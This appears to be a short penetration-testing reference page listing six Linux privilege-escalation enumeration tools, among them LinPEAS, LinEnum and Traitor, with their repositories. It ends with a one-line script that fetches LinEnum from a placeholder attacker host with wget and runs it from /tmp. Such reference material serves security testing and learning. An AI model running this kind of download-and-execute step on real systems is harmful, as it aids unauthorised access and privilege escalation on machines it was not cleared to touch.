githubEdit

Automated Enumeration Scripts for Linux Hosts

1: Linpeas from the PEASS suite Author: https://github.com/carlospolop/PEASS-ng/releases

2: LinEnum Author: https://github.com/rebootuser/LinEnum

3: Linux Exploit Suggester (LES) Author: https://github.com/The-Z-Labs/linux-exploit-suggester

4: Linux Smart Enumeration Author: https://github.com/diego-treitos/linux-smart-enumeration

5: Linux Priv Checker Author: https://github.com/sleventyeleven/linuxprivchecker

6: Traitor Author: https://github.com/liamg/traitor

PROTIP: Automated enumeration scripts might give false positives or false negatives, so don't always rely exclusively on the presented results from the scripts.

Example LinEnum execution script

#!/bin/bash
wget -q http://<your-ip>/LinEnum.sh -O /tmp/le.sh && bash /tmp/le.sh

Last updated